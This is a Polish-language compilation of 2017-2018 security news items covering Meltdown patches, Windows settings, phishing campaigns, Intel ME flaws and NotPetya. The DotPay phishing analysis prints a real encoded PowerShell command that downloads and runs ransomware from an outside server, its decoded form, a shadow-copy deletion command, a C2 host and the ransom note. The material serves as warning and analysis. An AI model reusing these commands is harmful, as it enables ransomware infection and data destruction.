Luka w procesorach Intela spowoduje obniżenie wydajności o 30%

Intel czeka w najbliższym czasie bardzo trudny okres, ponieważ jak wynika z pojawiających się w sieci doniesień, jego procesory zawierają poważną lukę bezpieczeństwa, której nie można załatać przez aktualizację mikrokodu i wymaga to wprowadzenia poprawki w OS. Co więcej, tyczyć ma się to wszystkich CPU Niebieskich przynajmniej z ostatniej dekady.

Stosowny patch został już wydany dla Linuxa i lada moment Microsoft powinien dostarczyć go także na urządzenia z Windowsem. Jak na razie ze względów bezpieczeństwa nie są oficjalnie podawane szczegóły exploita, ani zagrożenie jakie ze sobą niesie. Z przecieków wynika jednak, że sprawa jest bardzo poważana, ponieważ mówiąc najprościej luka pozwalać ma standardowym programom na “nielegalny” dostęp do pewnej zawartości chronionej w pamięci jądra systemu operacyjnego (Kernel). Naprawienie tego wymaga implementacji Kernel Page Table Isolation (KPTI), które ukrywa Kernel dla działających procesów, ale niesie ze sobą poważne konsekwencje dla wydajności procesorów. Wiąże się to z dodatkowym obciążeniem procesora związanym z utrzymaniem bariery pomiędzy przestrzeniami adresowymi pamięci i podobno spodziewać mamy się tu obniżenia osiągów o 5% do nawet 30% (w mniejszym stopniu podatne mają być nowsze CPU procesory Intela z włączonym Process-Context Identifiers). Spadek wydajności w dużej mierze zależny będzie od modelu procesora i zastosowania – nie wiemy, czy wpłynie to na wydajność w grach.

intel-cpu-kernel-memory-bug

Luka jest szczególnie groźna w przypadku korzystania z wirtualnych środowisk, ponieważ pozwalać ma użytkownikom wirtualnej maszyny  (VM) na dostęp do danych innego VM na tym samym fizycznym sprzęcie. Celem ataków wykorzystujących tę podatność mają być takie środowiska, jak Amazon EC2 czy Google Compute Engine, a nie bez powodu wiele osób łączy z tą sprawą zaplanowane na przyszły tydzień konserwacje Microsoft Azure i Amazon Web Services Basically.

Co warto podkreślić, procesory AMD nie są podatne na to zagrożenie, ale co ciekawe, wypuszczona dla Linuxa łatka wpływa na wszystkie procesory x86, dlatego też, by uniknąć spadków wydajności, Czerwoni zalecają jej nie instalować. W przypadku aktualizacji dla Windowsa szykowanej przez Microsoft, poprawki powinny objąć już tylko procesory Niebieskich.

Portal Phoronix opublikował już nawet wstępne testy po zainstalowaniu aktualizacji na systemie Linux i wydajność w tym wypadku zaliczyła spadek rzędu 17-18%. Jak sytuacja będzie wyglądać na Windowsie? Tego jeszcze nie wiemy, ale zapewne najbliższe dni przyniosą odpowiedź na to pytanie.

phronix-compile-bench-test

źródło: frazpc.pl

Ekran śmierci po łatce Microsoftu – winne programy antywirusowe

Wydana w tym tygodniu przez Microsoft łatka KB4056892 uodparnia Windowsa na atak Meltdown – odczytanie chronionej pamięci kernela przez zwykłą aplikację. Uodpornienie wiąże się jednak z ogromnymi zmianami w architekturze pamięci, nie dziwcie się więc, jeśli po jej zainstalowaniu zobaczyliście niebieski ekran śmierci. Winę w tym wypadku może ponosić program antywirusowy.

Najnowsza łatka wprowadza do Windows 10 wersji 1709 po zastosowaniu łatki rozwiązanie analogiczne do tego, co znamy z Linuksa (KPTI), całkowicie oddzielając od siebie pamięć kernela i pamięć przestrzeni użytkownika. Nosi to nazwę ASLR/VA Isolation, i podobnie jak KPTI dokładnie czyści też bufor TLB (translation lookaside buffer), czyli pamięć podręczną mikroprocesora, w której przechowywane są fragmenty tablicy stron pamięci operacyjnej komputera. Jak to wygląda w praktyce przedstawił ostatnio badacz Alex Ionescu w swoim tweecie:

 

View image on TwitterView image on Twitter

Wszyscy ci, którzy pospieszyli się z instalowaniem jak najszybciej tej łatki, wydanej dotąd tylko na najnowsze Windows 10 i Windows Servera, mogą mieć problemy, związane z nieprzeczytaniem wcześniej ostrzeżeń dla wszystkich tych, którzy korzystają z antywirusa innego niż Windows Defender.

Problem wynika z tego, że nagle wiele zachowań antywirusów stało się „nielegalnych” – wywołań bezpośrednio do pamięci kernela Windowsa. Takie zaś wywołania kończą się zwykle niebieskim ekranem śmierci i niemożliwością uruchomienia systemu. Aby uniknąć tej sytuacji, łatka z ASLR/VA Isolation powinna zostać pobrana i zainstalowana tylko na tych komputerach, na których antywirusy zostały wcześniej zaktualizowane i umieściły specjalny wpis w rejestrze. Najwyraźniej nie w każdym wypadku to zadziałało, albo użytkownicy na własną rękę wymusili instalację łatki – a później patrzyli na piękny niebieski ekran.

Jak do tej pory (5 stycznia 2018 roku) takie zmiany wprowadziła już większość popularnych producentów antywirusów – szczegóły znajdziecie w poniższej tabelce.

Producent Klucz w rejestrze Wsparcie dla ASLR/VA Więcej informacji
AVAST T T Forum Avasta
Avira T T Forum Wildersecurity
BitDefender N N Wsparcie BitDefender
ESET T T
F-Secure T T Społeczność F-Secure
G-DATA N N
Kaspersky T T Wsparcie Kaspersky Lab
Malwarebytes T T Blog Malwarebytes
McAfee N T Baza wiedzy McAfee
Microsoft T T
Norton T T
Sophos N T Społeczność Sophos
Symantec T T Twitter
Trend Micro N T Wsparcie Trend Micro

Jeśli antywirus nie jest wspierany, lepiej nie ryzykować. Tam jednak, gdzie klucz rejestru nie został jeszcze ustawiony, a producent dał znać, że dostosował swój produkt do zmian w architekturze pamięci Windowsa, można spróbować wymusić instalację KB4056892 ręcznie.

W ten celu należy do Rejestru dodać odpowiedni klucz. Jego lokalizacja toHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat, nazwa to cadca5fe-87d3-4b96-b7fb-a231484277cc, typ REG_DWORD a wartość to 0x00000000.

 

źdródło: dobre programy.pl

Włącz ochronę przed ransomware w Windows 10

Wśród rozlicznych funkcji wprowadzonych przez Microsoft do Windowsa 10 w aktualizacji Fall Creators Update jedna jest szczególnie na czasie. Dręczeni plagą ransomware użytkownicy mogą teraz zabezpieczyć teraz swoje dane tak, że nawet po zainfekowaniu komputera przez nawet najbardziej zaawansowane dziś szkodniki, pozostaną one nietknięte. Zapraszamy do zapoznania się z wykorzystaniem funkcji Kontrolowany dostęp do folderu, będącej częścią ulepszeń wprowadzonych w narzędziu antywirusowym Windows Defender.

Tak jak sama nazwa wskazuje, Kontrolowany dostęp do folderu pozwala użytkownikom określić, kto i na jakich warunkach będzie mógł uzyskać dostęp do danych przechowywanych we wskazanych folderach. Domyślna konfiguracja jest nastawiona na maksymalne bezpieczeństwo, tj. blokuje wszelkie próby dostępu innych procesów. Dzięki temu w teorii powinno to ocalić pliki przed zaszyfrowaniem przez szkodnika – o ile oczywiście w końcu nie zostaną znalezione sposoby obejścia tego zabezpiecznie.

Jak włączyć Kontrolowany dostęp do folderu?

W systemowych Ustawieniach należy przejść do Aktualizacje i zabezpieczenia, a tam z listy paska bocznego wybrać Windows Defender i w jego panelu kliknąć przycisk Otwórz usługę Windows Defender Security Center.

Otwarty panel zarządzania Windows Defendera na drugiej pozycji listy menu bocznego zawiera pozycję Ochrona przed wirusami i zagrożeniami. Należy ją wybrać, a następnie w głównym widoku programu kliknąć Ustawienia ochrony przed wirusami i zagrożeniami.

Kolejny widok należy przewinąć myszką w dół, aż dotrzemy do opcji Kontrolowany dostęp do folderu. Włączamy ją normalnym przełącznikiem – Windows zapyta wówczas o zgodę na wprowadzenie zmian przez Windows Defender Security Center. Oczywiście należy się zgodzić.

Teraz należy wskazać foldery, które będą tą funkcją chronione. Klikamy link Chronione foldery – jak widać, domyślnie są już chronione wszystkie foldery systemowe. By dodać własne foldery, należy kliknąć przycisk Dodaj chroniony folder.

Teraz należy wskazać aplikacje, która będą miały prawo dostępu do chronionego folderu. W tym celu cofamy się do poprzedniego widoku i wybieramy link Zezwalaj aplikacji na dostęp przez funkcję Kontrolowany dostęp do folderu, a na następnym ekranie klikamy Dodaj dozwoloną aplikację. Niestety Microsoft nie zrobił tego dobrze, zamiast wyświetlić okno dialogowe z listą zainstalowanych aplikacji, wyświetla zwykły selektor plików, za którego pomocą należy odnaleźć i wskazać aplikację w systemie plików. Przykładowo wybraliśmy Notatnik (C:\Windows\notepad.exe).

Macie dość klikania? Na szczęście Kontrolowany dostęp do folderu można szybko włączyć z konsoli Powershella, wydając polecenie

Set-MpPreference -EnableControlledFolderAccess Enabled

Wyłączenie odbywa się analogicznie, poleceniem
Set-MpPreference
-EnableControlledFolderAccess Disabled

Co się stanie, jeśli jakiś nieupoważniony program spróbuje uzyskać dostęp do chronionego folderu? Nic takiego – po prostu go nie dostanie i nie wprowadzi zmian. Sprawdziliśmy (oczywiście w maszynie wirtualnej z odłączonym dostępem do sieci) działanie popularnego CryptoWalla: zainstalowany i uruchomiony zaszyfrował wszystko poza chronionymi folderami.

Potwierdza to spostrzeżenia niezależnych badaczy: choć interfejs użytkownika jest taki sobie, a system nie wyświetla powiadomień o nieupoważnionym dostępie do plików (można skorzystać z funkcji logowania Windows Defendera, dostępnej po aktywacji trybu audytu za pomocą rozszerzenia Windows Defender Exploit Guard), to jednak Kontrolowany dostęp robi to, co powinien robić – skutecznie chroni przed atakami ransomware, nawet jeśli sam Windows Defender przed nimi nie obroni.

 

źródło:dobreprogramy.pl

Windows 10 Anniversary Update instaluje oprogramowanie bez zgody użytkownika

Wraz z Windows 10 Anniversary Update (wersja 1607) Microsoft wprowadził nową funkcjonalność do Content Delivery Manager, komponentu wcześniej wykorzystywanego głównie do sugerowania użytkownikom aplikacji w menu Start czy wyświetlaniu im ładnych obrazków na ekranie logowania. Pozwala ona na zdalne instalowanie użytkownikom przeróżnego oprogramowania – i to bez żadnej interakcji z jej strony. Niepokojące? Czytajcie dalej. Pół roku temu w ten sposób Microsoft zainstalował menedżera haseł Keeper, firmy Keeper Security Inc. Teraz Tavis Ormandy, słynny ekspert Google’a od bezpieczeństwa oprogramowania, zademonstrował, jak dowolna strona internetowa może z Keepera wykraść wszystkie hasła użytkownika.

W założeniu Content Delivery Manager miał preinstalować aplikacje w systemie Windows 10, bazując na znanych Microsoftowi upodobaniach użytkownika. W ten sposób można było dostać np. Adobe Photoshopa Express, Netflixa czy nawet Farmville. Wybór zależał najpewniej od porozumień partnerskich, jakie Microsoft zawarł z producentami oprogramowania. Mechanizm dystrybucji wydawał się niezawodny – zwykły użytkownik praktycznie nie miał jak uniknąć tych niechcianych korzyści, by wyłączyć ich instalację, musiał ingerować w Rejestr.

Tak właśnie na komputery użytkowników trafił Keeper, program do zarządzania hasłami, co do którego Tavis Ormandy miał już wcześniej zastrzeżenia. W zeszłym roku odkrył on, że jego rozszerzenie przeglądarkowe wstrzykuje swój zaufany interfejs w niezaufane strony, co pozwalało uzłośliwionej stronie na wykradnięcie hasła poprzez niewidoczny formularz. Luka ta została załatana w wersji 10.1.3 aplikacji… choć łatka była dość specyficzna. Po prostu usunięto funkcje wyszukiwania i dodawania hasła do istniejącego rekordu, które można było wykorzystać do ataku.

Teraz Ormandy znów sobie przypomniał o Keeperze. Odkrył, że znów Keeper robi to samo – w wersji dostarczanej dla nie mających wyboru użytkowników Windowsa 10. Wystarczyło zmienić selektory i stary atak znów działał. Okazał jednak deweloperom menedżera łaskę i poinformował ich z wyprzedzeniem. Zespół Keepera wydał poprawkę (w wersji 11.4.4 aplikacji) po otrzymaniu jego zgłoszenia. Jak pisze Craig Lurey, dyrektor techniczny Keeper Security, znów zrobiono to samo co wcześniej – usunięto funkcję dodawania hasła do istniejącej witryny, podjęto też starania by ponownie ta podatność się nie ujawniła.

Zespół bezpieczeństwa Keepera podkreśla, że odkryta przez Ormandy’ego luka nie została wykorzystana w atakach, jednak wszelkie takie zgłoszenia traktuje bardzo poważnie, ponieważ bezpieczeństwo i ochrona danych użytkowników jest priorytetem dla firmy.

Tymczasem Content Delivery Manager wciąż działa, instalując w tle oprogramowanie użytkownikom Windowsa 10. Jeśli chcecie wyłączyć tę funkcję, musicie uruchomić edytor Rejestru (regedit.exe), następnie dostać się do klucza HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager, a następnie zmienić wartość SilentInstalledAppsEnabled na 0.

 

źródło: dobreprogramy.pl

Uwaga na e-maile podszywające się pod DotPay — otworzenie załącznika może Cię kosztować 350 PLN

Od rana informujecie nas o e-maila podszywających się pod firmę DotPay jakie dostajecie na swoje prywatne i firmowe skrzynki. Do wiadomości załączony jest plik, którego otworzenie może zakończyć się infekcją komputera złośliwym oprogramowaniem. Przyjrzymy się wiadomości:

Received: from abl224.rev.netart.pl (77.55.37.224)

From: noreply@dotpay.pl [mailto:noreply@dotpay.pl]
Sent: Tuesday, November 21, 2017 3:40 AM
Subject: Płatność w systemie Dotpay M6694-5134

Numer transakcji:
M6694-5134

Kwota:
62,37 PLN

Status:
wykonana

Drogi Użytkowniku! (Adresatem tej wiadomości jest [$EMAIL_ODBIORCY]).

Odnotowaliśmy próbę płatności w kwocie 62,37 PLN

Opis zamówienia:
Wplata online
Data i czas:
21 listopada 2017 23:42:59

Jeżeli wpłata została dokonana przelewem, odbiorcą przelewu na wyciągu będzie Dotpay SA Wielicka 72, 30-552 Kraków.

Informacja o wykonaniu płatności została przekazana do sprzedawcy, a należne mu środki udostępnione w Serwisie Dotpay.

Ewentualne pytania dotyczące realizacji zamówienia prosimy kierować do sprzedawcy.

Ta wiadomość została wygenerowana automatycznie. Prosimy na nią nie odpowiadać.

Z nadesłanych do nas próbek wynika, że rozsyłanych jest kilka wariantów e-maili (zmienia się numer transakcji i kwota). Oto te, zaobserwowane w przesłanych od Was e-mailach:


M6694-5134 63,37
M7822-5134 302,17
M7295-1680 620,47

Co ciekawe, w pierwszym z ww. wariantów, e-mail wspomina o transakcji z przyszłości (21 listopada) — w kolejnych wariantach atakujący wrócił z podróży w czasie do teraźniejszości 😉

Sama treść e-maila nie jest groźna. Na czym więc polega atak? Na uruchomieniu dołączonego do e-maila załącznika — do którego jednak w ogóle nie odnosi się treść wiadomości. Ciekawe jak bardzo negatywnie wpłynie to na wyniki kampanii — Armaged0n, dasz nam znać na maila? 🙂

Złośliwy załącznik

Do e-maila załączony jest plik:

Platnosc_w_systemie_Dotpay_M6694-5134_PDF.z

będący archiwum zawierającym następujący katalog i plik:

Płatnosc_w_systemie_Dotpay_M6694-5134_PDF.js

o następującej zawartości:

Kliknięcie na ten plik w systemie Windows spowoduje uruchomienie polecenia w PowerShellu, które podbierze i uruchomi złośliwe oprogramowanie szyfrujące dysk.


powershell.exe powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -EncodedCommand
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQB
jAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQ
AbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKAB
OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEM
AbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA
6AC8ALwB0AGUAbgBvAHIALgBjAG8AbQAuAHAAbAAvAHAAbABpAGsAaQAvAGIAaQBuAHM
AdAB4AHQALgBlAHgAZQAnACwAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGIAaQB
uAHMALgBlAHgAZQAdICkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAdICQ
AZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYgBpAG4AcwAuAGUAeABlAB0gKQA=

czyli:


PowerShell -command ( System.Net.WebClient).DownloadFile('http://tenor.com.pl/
pliki/binstxt.exe','C:\Users\xxx\AppData\Roaming'\bins.exe);
Start-Process ('C:\Users\xxx\AppData\Roaming'\bins.exe);)

Skrypt uruchamia plik binstxt.exe (ransomware) z serwera tenor.com.pl (85.128.135.36) oraz kasuje kopie plików, które zaraz zostaną zaszyfrowane:

cmd.exe vssadmin.exe Delete Shadows /All /Quiet

Złośliwe oprogramowanie melduje się także do serwera

plaamkaa.eu 104.28.0.113

…i po zakończeniu szyfrowania pokazuje ofierze następujący komunikat:

V_o_r_t_e_x R_a_n_s_o_m_w_a_r_e

!!!! U W A G A !!!! Masz Problem Ze Znalezieniem Potrzebnych Danych ? Nie Moesz Otworzy Swoich Dokumentw? Po Otworzeniu Wanych Plikw Widzisz Tylko Nic Nie Mwicy, Dziwny Cig Znakw? Twoje Istotne Pliki Zostay Zaszyfrowane ! Twoje Zdjcia, Dokumenty, Bazy Danych, Zostay Zaszyfrowane Niemozliwym Do Zlamania Algorytmem Aes-256 Metody Tej Do Szyfrowania Zawartosci Dokumentw Uzywaja Sluzby Wywiadowcze I Wojsko.

Gdy To Czytasz Proces Jest Zakoczony, Wytypowane Pliki Zostay Zaszyfrowane A Sam Program Usunity Z Twojego Komputera. Odzyskac Twoje Dane Mozna Tylko Przy Pomocy Dedykowanego Programu Deszyfrujcego, Wraz Z Jednorazowym Kluczem Wygenerowanym Unikalnie Dla Ciebie! Dwa Pliki Odszyfrujemy Bez Opaty Aby Nie By Goosownymi, Za Pozostae Bdziecie Pastwo Musieli Zapaci 100$ Aby Odzyska Pliki Skontaktuj Si Z Nami Pod Adresem: Hc9@2.pl Lub Hc9@goat.si Radzimy Decydowa Si Szybko, 4 Dni Od Zaszyfrowania Opata Zostanie Podniesiona Do 200$.

Kontaktujac Sie Z Nami Pamietaj Aby Podac Id-komputera I Date DANE: IP=X ID=X Data=21-11-2017 00:33:09

źródło: niebezpiecznik.pl

Nowa mutacja trojana Agent omija antywirusy

Nie ma dnia bez nowych próbek złośliwego oprogramowania. Szczęśliwie w zdecydowanej większości są szybko wychwytywane przez oprogramowanie antywirusowe. Dzisiaj rano dostaliśmy jednak w redakcyjnej poczcie szkodnika, który gładko przeszedł przez praktycznie wszystkie programy antywirusowe. Biorąc pod uwagę skłonność internautów do klikania we wszystko, co wygląda na korespondencję urzędową, tym razem zagrożenie jest poważne.

E-mail wygląda przyzwoicie – niejaka Krajowa Administracja Skarbowa przesyła „fakturę 13/11/2017” – jak na listopad, to dobry numer. W środku załącznik w archiwum zip, i kilka słów poprawną polszczyzną – Jakub Kowalski prosi o dołączenie faktury i pozdrawia. Miliony takich wiadomości krążą między firmami i urzędami.

Kliknięcie załącznika w Windowsie rozpakowuje go, a próba otworzenia dokumentu uruchamia domyślną przeglądarkę systemową. Reakcja antywirusa? Żadna. Nawet świetny program Kasperskiego dał się podejść, uznając że plik o nazwie deklaracja (6).js jest bezpieczny. W rzeczywistości jednak mamy do czynienia z nową mutacją trojana z rodziny Agent (JS.Trojan-Downloader.Agent.yq).

Po uruchomieniu w systemie, trojan pobrał z Internetu i zainstalował sniffera Win32/Ursnif, który zmienił zawartość Rejestru, ustawienia firewalla i zaczął rozmawiać z serwerami z chińskiego Internetu – najwyraźniej czekając na jakieś ciekawe dane, takie jak loginy i hasła użytkownika. To, że w Windowsie 10 działał Defender, włączona była ochrona przed exploitami, najwyraźniej nie czyniło żadnej różnicy.

Obecnie serwis Virus Total informuje, że jedynie dwa silniki antywirusowe rozpoznają nową mutację Agenta – Baidu (co ładnie koreluje z rozmowami z chińskimi serwerami) oraz Fortinet. Prosimy więc o zachowanie najwyższej ostrożności przy przeglądaniu jakichkolwiek załączników do e-maili, szczególnie jeśli pochodzą z nieznanych nam źródeł.

Klasyczne hasło o aktualnym systemie i aktualnym antywirusie tym razem sobie podarujemy, zarażony system był przecież świeżutkim Windowsem 10. Zapewne jutro antywirusy będą już wykrywały co trzeba, jednak jutro dla wielu może być za późno.

źródło: dobreprogramy.pl

9.9.9.9 – nowy bezpieczny serwer DNS

Jeśli nie ufacie swoim dostawcom Internetu w kwestii prywatności zapytań do serwerów DNS o nazwy domen, można zawsze skorzystać z największego na świecie publicznego serwera Google, słynnego 8.8.8.8. A co, jeśli w dodatku nie ufacie Google? Już dziś możecie w ustawieniach DNS systemu operacyjnego czy routera wpisać adres IP 9.9.9.9. To nowa publiczna usługa DNS o nazwie Quad9, udostępniona przez Global Cyber Alliance (GCA), która nie tylko zapewnić ma internautom najwyższy poziom prywatności, ale też najwyższy poziom bezpieczeństwa.

Operator Quad9 zapewnia, że zapytaniami nie będą karmione żadne usługi Big Data, że nie będzie przechowywać żadnych danych pozwalających na zidentyfikowanie użytkowników ani też skorelowanie ich z dostępnymi informacjami z innych źródeł – co dziś jest niestety dość częstą praktyką dostawców Internetu, wykorzystujących informacje o zapytaniach użytkowników do budowania ich marketingowych person.

Czy jednak faktycznie można wierzyć w takie zapewnienia? Google w odniesieniu do swojego 8.8.8.8 mówi to dokładnie to samo, mimo że firma z Mountain View siedzi głęboko w biznesie gromadzenia danych o internautach. W wypadku 9.9.9.9 trzeba pamiętać, że za Global Cyber Alliance stoją londyńska policja (City of London Police) oraz nowojorska prokuratura okręgowa (District Attorney of New York County). Ich celem ma być oczywiście walka z cyberzagrożeniami, szczególnie tymi, które wykorzystują słabo zabezpieczone końcówki Internetu Rzeczy. To, czy zaufacie tym wyjaśnieniom zależy oczywiście od Was.

Od samej strony technicznej 9.9.9.9 nie można nic zarzucić. Resolwer działa niezwykle szybko, momentami dwukrotnie szybciej niż ten google’owy, wykorzystuje 70 punktów wejścia w 40 krajach, dostarczonych przez partnera inicjatywy – Packet Clearing House. Dla zainteresowanych uruchomiono też dostęp po IPv6, pod adresem 2620:fe::fe.

Jak zmienić serwer DNS w systemach Windows?

Aby zmienić ustawienia DNS w Windowsie na Quad9, należy kolejno:

  1. w Zasobniku paska zadań wybrać ikonę połączenia sieciowego i z menu kontekstowego wejść w Centrum Sieci i udostępniania,
  2. w lewym górnym menu okna wybrać link Zmień ustawienia karty sieciowej
  3. w nowym oknie wybrać kartę sieciową, nacisnąć prawy przycisk myszy i wybrać Właściwości
  4. w nowym okienku zaznaczyć pozycję Protokół internetowy w wersji 4 (TCP/IPv4) i kliknąć przycisk Właściwości
  5. w okienku Właściwości zaznaczyć Użyj następujących adresów DNS i w polu preferowany adres DNS wpisać 9.9.9.9, a następnie kliknąć OK.

 

źródło: dobreprogramy.pl

Czipsety płyt głównych Intel-a od skylike z poważną dziurą

Intel przyznaje się do dziur w Management Engine

Google dobrze wiedziało co robi, usuwając ze swoich serwerów Intel Management Engine oraz firmware UEFI, by zastąpić je minimalistycznym Linuksem. Intel właśnie przyznał się do katastrofalnych wręcz w swej naturze błędów w oprogramowaniu działającym poniżej warstwy systemu operacyjnego, które otwierają drogę do instalowania niewykrywalnych rootkitów. Narażeni są użytkownicy sprzętu z najnowszą wersją Management Engine, tj. procesorów Core 6. generacji i nowszych, a także układów Xeon, Celeron, Pentium i Atom.

To odkrycie przypadło ludziom ze znanej już z badań w tej tematyce firmy Positve Technologies. Już we wrześniu informowali oni, że są w stanie uruchomić niepodpisany kod w Platform Controler Hubie na dowolnej płycie głównej poczynając od mikroarchitektury Skylake – i obiecali, że pokażą jak to działa podczas najbliższej konferencji Black Hat Europe, która rozpocznie się 4 grudnia w Londynie.

Dopiero teraz Intel zajął głos w tej sprawie – i przyznaje, że odkrywcy zagrożenia, Dmitrij Skliarow, Mark Ermołow i Maksym Gorjaczij, mają rację. Intel Management Engine (ME), Server Platform Services (SPS) oraz Trusted  Execution Engine  są pełne luk, które pozwalają każdemu posiadającemu uprawnienia administracyjne na uruchomienie niewykrywalnego dla użytkownika kodu poniżej systemu operacyjnego. Takie rootkity są w praktyce niemożliwe do wykrycia, czy to za pomocą narzędzi antywirusowych, czy nawet specjalizowanych narzędzi.

Po zainstalowaniu takiego złośliwego oprogramowania na Platform Controller Hubie, może ono pozyskiwać dowolne informacje z pamięci komputera, bez względu na zabezpieczenia systemu operacyjnego. W ten sposób może wydobyć nawet hasła i klucze kryptograficzne, by przeprowadzić dalsze ataki.

Lista zagrożonych czipsetów jest spora, jak wspomnieliśmy obejmuje płyty główne dla praktycznie wszystkich współcześnie produkowanych czipów Intela. Są to:

  • procesory Intel Core 6., 7. i 8. generacji
  • procesory Intel Xeon E3-1200 v5 i v6
  • procesory Intel Xeon Scalable
  • procesory Intel Xeon W
  • procesory Intel Atom C3000
  • procesory Intel Atom E3900 (Apollo Lake)
  • procesory Intel Pentium (Apollo Lake)
  • procesory Celeron z serii N i J.

Wszystkie płyty główne tych procesorów zawierają praktycznie nieudokumentowaną czarną skrzynkę, działającą na bazie 32-bitowego rdzenia x86 Quark oraz systemu operacyjnego MINIX. To właśnie w niej zaimplementowana jest Intel Management Engine, pozwalająca na zdalne zarządzanie komputerami, Server Platform Services, służące do zdalnego zarządzania serwerami w centrach danych, oraz Trusted Execution Engine, sprzętowy system uwierzytelniania dla kodu.

Znany ekspert Matthew Garret zwrócił uwagę na jeszcze jedną kwestię – te luki pozwalają także zdalnym użytkownikom na przeprowadzenie ataku. Wystarczy wykorzystać wcześniej wykrytą lukę w Active Management Technology (AMT), która pozwalała na uwierzytelnienie się za pomocą pustego tokena. Jeśli do tej pory nie załataliście firmware w swoich komputerach wykorzystujących AMT (dotyczy to przede wszystkim sprzętu korporacyjnego), najwyższy czas to zrobić.

A jak zabezpieczyć się przed lukami w IME i innych technologiach Intela oficjalną drogą, bez niszczenia Management Engine za pomocą narzędzia ME_cleaner? Intel zaleca użytkownikom Windowsa i Linuksa pobranie narzędzia Intel-SA-00086, które sprawdzi, czy są oni zagrożeni. Później… no cóż, pozostaje czekać na łatki producentów. Pierwsze jest tu Lenovo, które wydało łatki do zainstalowania z poziomu Windows 10, 8.1 oraz 7. Działających pod Linuksem łatek brak.

 

źródło: dobreprogramy.pl

Petya – uwaga na nowe zagrożenie ransomware

Z wielu firm i instytucji na całym świecie płyną niepokojące wiadomości, według których mamy do czynienia z kolejnym masowym atakiem z wykorzystaniem ransomware. Według dotychczasowych informacji, może chodzić o ransomware Petya.

 

O atakach na rosyjski i ukraiński przemysł naftowy donosi między innymi Reuters. The Next Web informuje o całkowitej awarii systemów duńskiego konglomeratu transportowo-energetycznego Maersk czy kijowskiego lotniska Boryspol. Atak potwierdza brytyjska agencja reklamowa WPP. Wszystkie operacje są także wstrzymane w rosyjskich oddziałach Home Credit – konsultant banku potwierdził, że z powodu ataku hakerskiego.

 

Na razie nie jest znany wektor ataku, według ofiar komunikat informujący o zaszyfrowaniu dysku pochodzi od ransomware Petya. W marcu zeszłego roku dokonywano nim infekcji za pomocą pobieranego z Dropboksa résumé fikcyjnej osoby, ubiegającej się o pracę. Pracownicy z działu HR nie baczyli na to, że plik jest wykonywalny. Jeżeli faktycznie mamy do czynienia z Petya, to zagrożenie jest znane – program po uruchomieniu restartuje komputer, modyfikuje Master Boot Record, a następnie wyświetla fałszywą informację o sprawdzaniu dysku przez CKDSK. Wówczas dane są szyfrowane.

Rzecz w tym, że Petyę rozpoznają antywirusy (Win32.Trojan-Ransom.Petya.A), a w kwietniu zeszłego roku udostępniono narzędzie PetyaExtractor, które umożliwia wygenerowania hasła. Najpewniej jednak mamy do czynienia ze zmodyfikowaną Petyą.

Analitycy Kaspersky Lab dzielą się kolejnymi informacjami na temat ataku. Opublikowany został już wykres, na którym znalazły się państwa z jak dotąd największą liczbą infekcji. Nie zostały udostępnione bezwzględne wartości, a jedynie procent infekcji w danym kraju z liczby wszystkich odnotowanych dotąd ataków.

Niestety, Polska znajduje się w ścisłej czołówce. Nad Wisłą znajduje się około 5% wszystkich zainfekowanych dotąd maszyn. Więcej ulokowanych jest w jedynie w Rosji (nieco ponad 30%) oraz przede wszystkim na Ukrainie, gdzie znajduje się aż 60% zainfekowanych komputerów.

Pojawiły się pierwsze informacje na temat ewentualnego wektora ataku. Departament Cyberpolicji Narodowej Policji Ukrainy w opublikowanym na Facebooku komunikacie wskazuje na M.E.Doc, popularny na Ukrainie program do zarządzania dokumentacją. Co ważne, używany także w wymianie dokumentów z instytucjami rządowymi.

Według ukraińskiej policji, dziś o 10:30 M.E.Doc automatycznie pobrał aktualizację.

Tworzy ona plik rundll32.exe, a następnie analizuje sieć za pośrednictwem portów 139 i 445, tych samych które wykorzystuje protokół SMBv1 – to właśnie jego podatność była wektorem WannaCry/ETERNALBLUE.

Następnie uruchamiane było cmd.exe, , gdzie wykonywane są dwa polecenia:
c schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR  oraz C:\Windows\system32\shutdown.exe /r /f" /ST 14:35. Po zaplanowaniu wyłączenia tworzony był plik ac3.tmp oraz dllhost.dat.

Tak prezentują się ustalenia ukraińskiej policji, pojawiło się już także stanowisko M.E.Doc. Warto zwrócić uwagę, że na stronie programu opublikowano dziś informację, że zaatakowane zostały serwery producenta. Przez niektóre media jest ona mylnie interpretowana jako potwierdzenie, że wówczas podmieniono pliki, tymczasem pierwszy komunikat sugeruje jedynie, że infrastruktura M.E.Doc mogła być jedną z pierwszych ofiar

Przed godziną producent M.E.Doc opublikował kolejny komunikat, w którym zdecydowanie zaprzecza, że źródłem ataku jest aktualizacja programu oraz potwierdza, że jest jedną z ofiar.

Polskie firmy też zainfekowane

Pierwsze ataki na terenie Polski odnotowano w okolicach godziny 13. Podobnie jak na świecie, problem dotknął firm z branży logistycznej, ale poszkodowane są również mniejsze spółki usługowo-handlowe, które nie są związane z tym sektorem rynku. Do bycia ofiarą ataku w Polsce przyznało się kilka polskich spółek. Firma Raben ze względu na “międzynarodowe zagrożenie wirusowe, wstrzymała wszystkie operacje transportowe“, a od rana nie funkcjonuje też też Inter Cars. Wiemy też o ofiarach wśród kancelarii prawnych. Wedle naszych Czytelników, ofiarą ransomware padły też firmy: TNT w Katowicach, Kronospan, Mondelez we Wrocławiu, oraz jedna z działających na polskim rynku firm medycznych obecna także za wschodnią granicą. Nikt więc nie powinien się więc czuć bezpiecznie.

Zainfekowani użytkownicy napotykają kolejne komplikacje – nawet jeśli zdecydują się zapłacić okup, dane mogą pozostać zaszyfrowane. I to nie z winy atakujących.

